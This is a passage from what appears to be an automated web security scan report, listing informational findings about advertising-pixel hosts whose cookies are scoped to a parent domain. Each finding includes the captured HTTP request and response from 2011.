Set-Cookie: uid=1_1305543177_1302186535420:5639073448711300; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
Set-Cookie: cre=1_1305543177; Domain=.fetchback.com; Expires=Sat, 14-May-2016 10:52:57 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 10:52:57 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

12.53. http://pixel.mathtag.com/data/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/data/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1305510870; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:30 GMT
mt_mop=1:1305510843|5:1305510870|9:1305510197; domain=.mathtag.com; path=/; expires=Wed, 15-Jun-2011 01:54:30 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/img?mt_id=100040&mt_dcid=1305510867 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510843; mt_mop=9:1305510197|1:1305510843

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x785d 30813
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:30 GMT
Location: http://bid.openx.net/cm?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&dst=http://sync.mathtag.com/sync/img%3Fmt_exid%3D5%26mt_exuid%3D4dd07bc8-e97b-118c-3dec-7b8c5c306530
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510870; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:30 GMT
Set-Cookie: mt_mop=1:1305510843|5:1305510870|9:1305510197; domain=.mathtag.com; path=/; expires=Wed, 15-Jun-2011 01:54:30 GMT
Content-Length: 0

12.54. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1305510867; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=102938&mt_adid=100502&v1=&v2=&v3=&s1=&s2=&s3=&ord=627277572 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510197; mt_mop=9:1305510197

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1c77 7287
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:27 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510867; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:27 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

12.55. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5421&nid=2054&put=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2081=AG-00000001389358554; ses2=5032^1; csi2=3179363.js^1^1305508799^1305508799&3158416.js^1^1305508790^1305508790; put_1185=4325897289836481830; cd=false; au=GNQQ9N2W-FJJG-10.204.178.130; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C1%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C0%2C1%2C%2C; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5671%3D1%264212%3D1%263580%3D1%264222%3D1%266811%3D1%265421%3D1; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C1%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C1%2C2%2C%2C; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; expires=Wed, 15-Jun-2011 02:01:48 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.56. http://pixel.traveladvertising.com/Live/Pixel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.traveladvertising.com
Path:	/Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CookieId=2943716f476840758470c226fe759afb;Path=/;Domain=.traveladvertising.com;Expires=Sun, 08-Feb-2060 02:02:56 GMT
CookieDropperDropRetarget_CriteoRT=49600;Path=/;Domain=.traveladvertising.com;Expires=Wed, 15-Jun-2011 02:02:56 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Live/Pixel.aspx?PlacementId=49600 HTTP/1.1
Host: pixel.traveladvertising.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: image/gif
Expires: Mon, 16 May 2011 02:02:56 GMT
Last-Modified: Mon, 16 May 2011 02:02:56 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: CookieId=2943716f476840758470c226fe759afb;Path=/;Domain=.traveladvertising.com;Expires=Sun, 08-Feb-2060 02:02:56 GMT
Set-Cookie: CookieDropperDropRetarget_CriteoRT=49600;Path=/;Domain=.traveladvertising.com;Expires=Wed, 15-Jun-2011 02:02:56 GMT
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........L..;

12.57. http://px.steelhousemedia.com/pr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://px.steelhousemedia.com
Path:	/pr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

guid=1537f5df-e7b9-46ee-8bec-7f939810aa52;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
tts="eyJOUl85MDU2XzEyNiI6MCwiOTA1Nl80OCI6MTMwMjk1MDUwMDU3OCwiOTA1Nl80NiI6MTMwMjk1MDUwMDU3OCwiOTA1Nl80OSI6MTMwNTU0MjUwMDU3OCwiTlJfOTA1Nl83NSI6MCwiOTA1Nl8xMjYiOjEzMDI5NTA1MDA1NzgsIjkwNTZfNDQiOjEzMDI5NTA1MDA1NzgsIk5SXzkwNTZfMjY5IjowLCI5MDU2XzQyIjoxMzAyOTUwNTAwNTc4LCI5MDU2XzE3MyI6MTMwNTU0MjUwMDU3OCwiTlJfOTA1Nl8xNzMiOjAsIjkwNTZfMTcwIjoxMzAyOTUwNTAwNTc4LCJOUl85MDU2XzI3MCI6MCwiOTA1Nl8yODUiOjEzMDU1NDI1MDA1NzgsIjkwNTZfMjY5IjoxMzA1NTQyNTAwNTc4LCJOUl85MDU2XzEzOSI6MCwiTlJfOTA1Nl8yNzYiOjAsIjkwNTZfNzUiOjEzMDI5NTA1MDA1NzgsIk5SXzkwNTZfNDkiOjAsIk5SXzkwNTZfNDgiOjAsIk5SXzkwNTZfMjE3IjowLCJOUl85MDU2XzE3MCI6MCwiOTA1Nl8yMTciOjEzMDI5NTA1MDA1NzgsIjkwNTZfMjcwIjoxMzA1NTQyNTAwNTc4LCJOUl85MDU2XzQ0IjowLCI5MDU2XzEzOSI6MTMwMjk1MDUwMDU3OCwiTlJfOTA1Nl80NiI6MCwiTlJfOTA1Nl8yODUiOjAsIjkwNTZfMjc2IjoxMzA1NTQyNTAwNTc4LCJzdGlja3lJZF8yOSI6bnVsbCwiTlJfOTA1Nl80MiI6MH0=";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pr?get_px=1&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: checkCookie=success

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=1537f5df-e7b9-46ee-8bec-7f939810aa52;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: tts="eyJOUl85MDU2XzEyNiI6MCwiOTA1Nl80OCI6MTMwMjk1MDUwMDU3OCwiOTA1Nl80NiI6MTMwMjk1MDUwMDU3OCwiOTA1Nl80OSI6MTMwNTU0MjUwMDU3OCwiTlJfOTA1Nl83NSI6MCwiOTA1Nl8xMjYiOjEzMDI5NTA1MDA1NzgsIjkwNTZfNDQiOjEzMDI5NTA1MDA1NzgsIk5SXzkwNTZfMjY5IjowLCI5MDU2XzQyIjoxMzAyOTUwNTAwNTc4LCI5MDU2XzE3MyI6MTMwNTU0MjUwMDU3OCwiTlJfOTA1Nl8xNzMiOjAsIjkwNTZfMTcwIjoxMzAyOTUwNTAwNTc4LCJOUl85MDU2XzI3MCI6MCwiOTA1Nl8yODUiOjEzMDU1NDI1MDA1NzgsIjkwNTZfMjY5IjoxMzA1NTQyNTAwNTc4LCJOUl85MDU2XzEzOSI6MCwiTlJfOTA1Nl8yNzYiOjAsIjkwNTZfNzUiOjEzMDI5NTA1MDA1NzgsIk5SXzkwNTZfNDkiOjAsIk5SXzkwNTZfNDgiOjAsIk5SXzkwNTZfMjE3IjowLCJOUl85MDU2XzE3MCI6MCwiOTA1Nl8yMTciOjEzMDI5NTA1MDA1NzgsIjkwNTZfMjcwIjoxMzA1NTQyNTAwNTc4LCJOUl85MDU2XzQ0IjowLCI5MDU2XzEzOSI6MTMwMjk1MDUwMDU3OCwiTlJfOTA1Nl80NiI6MCwiTlJfOTA1Nl8yODUiOjAsIjkwNTZfMjc2IjoxMzA1NTQyNTAwNTc4LCJzdGlja3lJZF8yOSI6bnVsbCwiTlJfOTA1Nl80MiI6MH0=";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
Set-Cookie: checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

12.58. http://px.steelhousemedia.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://px.steelhousemedia.com
Path:	/st

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

guid=c056e86d-7ee9-4885-969a-4f3148039040;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
tts="eyJOUl85MDU2XzEyNiI6MCwiOTA1Nl80OCI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80NiI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80OSI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl83NSI6MCwiOTA1Nl8xMjYiOjEzMDI5NTA1MDA1NDAsIjkwNTZfNDQiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfMjY5IjowLCI5MDU2XzQyIjoxMzAyOTUwNTAwNTQwLCI5MDU2XzE3MyI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl8xNzMiOjAsIjkwNTZfMTcwIjoxMzAyOTUwNTAwNTQwLCJOUl85MDU2XzI3MCI6MCwiOTA1Nl8yODUiOjEzMDU1NDI1MDA1NDAsIjkwNTZfMjY5IjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzEzOSI6MCwiTlJfOTA1Nl8yNzYiOjAsIjkwNTZfNzUiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfNDkiOjAsIk5SXzkwNTZfNDgiOjAsIk5SXzkwNTZfMjE3IjowLCJOUl85MDU2XzE3MCI6MCwiOTA1Nl8yMTciOjEzMDI5NTA1MDA1NDAsIjkwNTZfMjcwIjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzQ0IjowLCI5MDU2XzEzOSI6MTMwMjk1MDUwMDU0MCwiTlJfOTA1Nl80NiI6MCwiTlJfOTA1Nl8yODUiOjAsIjkwNTZfMjc2IjoxMzA1NTQyNTAwNTQwLCJzdGlja3lJZF8yOSI6bnVsbCwiTlJfOTA1Nl80MiI6MH0=";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?get_px=1&aid=9056&cb=1305542498385515&ce=1 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: checkCookie=success

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=c056e86d-7ee9-4885-969a-4f3148039040;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: tts="eyJOUl85MDU2XzEyNiI6MCwiOTA1Nl80OCI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80NiI6MTMwMjk1MDUwMDU0MCwiOTA1Nl80OSI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl83NSI6MCwiOTA1Nl8xMjYiOjEzMDI5NTA1MDA1NDAsIjkwNTZfNDQiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfMjY5IjowLCI5MDU2XzQyIjoxMzAyOTUwNTAwNTQwLCI5MDU2XzE3MyI6MTMwNTU0MjUwMDU0MCwiTlJfOTA1Nl8xNzMiOjAsIjkwNTZfMTcwIjoxMzAyOTUwNTAwNTQwLCJOUl85MDU2XzI3MCI6MCwiOTA1Nl8yODUiOjEzMDU1NDI1MDA1NDAsIjkwNTZfMjY5IjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzEzOSI6MCwiTlJfOTA1Nl8yNzYiOjAsIjkwNTZfNzUiOjEzMDI5NTA1MDA1NDAsIk5SXzkwNTZfNDkiOjAsIk5SXzkwNTZfNDgiOjAsIk5SXzkwNTZfMjE3IjowLCJOUl85MDU2XzE3MCI6MCwiOTA1Nl8yMTciOjEzMDI5NTA1MDA1NDAsIjkwNTZfMjcwIjoxMzA1NTQyNTAwNTQwLCJOUl85MDU2XzQ0IjowLCI5MDU2XzEzOSI6MTMwMjk1MDUwMDU0MCwiTlJfOTA1Nl80NiI6MCwiTlJfOTA1Nl8yODUiOjAsIjkwNTZfMjc2IjoxMzA1NTQyNTAwNTQwLCJzdGlja3lJZF8yOSI6bnVsbCwiTlJfOTA1Nl80MiI6MH0=";Version=1;Domain=.steelhousemedia.com;Expires=Sat, 03-Jun-2079 13:55:47 GMT;Max-Age=2147483647
Set-Cookie: checkCookie=success;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

12.59. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
pf=qbuRlHr65Kba4HTyrdd5MH3JdGv9GZeYHo7AeFWHp0731R35t8tVFswvyCCUNmQRg2c436_EtLBPbUDtd-MYNmtAckgKwFTyh_sZsdEXBQ1CpT6DcV9IbY-hvpa_KWAErvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dfX6GDuctpcNnRGwBo7rSoxo-nkvo1J3Zd1nNNhXLF9CW1P_6CrTbMkoipJrBwBOyDD0FkxBUi5AYhqoFv0boAuD5cjBNWX99VFn97_13LO4; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=Z6z3HD7Ka9PFm_lTPlcJyUlQ-yO37BfURcbb7BumEMQAutjTrrs_D_o0Lv3V9pAvJVMIOj2uDziSnc27IJcNQA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=_CLkMkl0RMOD45j0Wsg1NVEsVAWo8oLKT7_oZjnIB4dd6ISB_q_vS5rapRhLZ6kj4SDJo80wBimsrZzphev9ivgHsb4j-oWssmPe5WFHQyURTUDkfjOHZfLNt9GGTnw4Zq6ZC8kiZ22OnHUC32mZqLE5y81TtPnlDGnC6fCswjA; fc=ePsfRpzouzhmWzaxidOOYedzXl_zByxS-dxKMy2bCgGwBKgjtjPFRrKyS70pSqF5MHH7n5N5MkRcXPZr8GbhWr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7C15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7Cundefined%7Cundefined%7C15110; rv=1; uid=4325897289836481830; pf=XgAYABZIGxSt-MC7IipMsd5bNlyEQRkkMhXrkam3PMXl_8wI-IuDElnwKB6wR_ZOUGkSMP8Pn8VAR8TvETdZeEwTo0JKIWMjMJy6tGuW8X1CxpGsLjr_FDSUO6s7DAN-rvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dUnpZvtX7vuT0qUgblStniCyP5ldTxhbfUs-5l57Hel2oSM7wYUtlfyTv5RTafjXWSMZ5CxcluAtg1HjNFrf1cA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
Set-Cookie: pf=qbuRlHr65Kba4HTyrdd5MH3JdGv9GZeYHo7AeFWHp0731R35t8tVFswvyCCUNmQRg2c436_EtLBPbUDtd-MYNmtAckgKwFTyh_sZsdEXBQ1CpT6DcV9IbY-hvpa_KWAErvwOhTKiEB6ozjplWfA-GmdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XMl066eGY_QbhSpsRERo8nuIuHRQTgKEhELMLulgSubjEdeE8ARPtyCF9fzzWEQ5dfX6GDuctpcNnRGwBo7rSoxo-nkvo1J3Zd1nNNhXLF9CW1P_6CrTbMkoipJrBwBOyDD0FkxBUi5AYhqoFv0boAuD5cjBNWX99VFn97_13LO4; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:56:37 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=706525&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:56:37 GMT

12.60. http://rya.rockyou.com/ams/ptrck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rya.rockyou.com
Path:	/ams/ptrck.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
_uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ams/ptrck.php?code=td9d4f46 HTTP/1.1
Host: rya.rockyou.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.3
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www236.rockyou.com took D=10868 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125

12.61. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

1315892-B1315899=0|0|0|0|0|1315897|1315896|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=16993&_t=cm HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4; 66281-B66290=3|0|0|0|0|66286|110253|-1; 90514-B90519=0|0|0|0|0|66286|110253|-1; M62795-747980=1; 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-1970 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1; domain=.ru4.com; path=/
Set-cookie: O16993=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: C1315892=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Content-type: text/html
Content-length: 20992
Connection: close

_cm_registerCallback(1105, function (data) {

//v3.7.18

var xptid = "";
var xpsid = "";
var xpcost = "";
var xpcg = "";
var xpordernum = "";
var xprand = 0; //tes
...[SNIP]...

12.62. http://sales.liveperson.net/hc/1402662/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/1402662/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

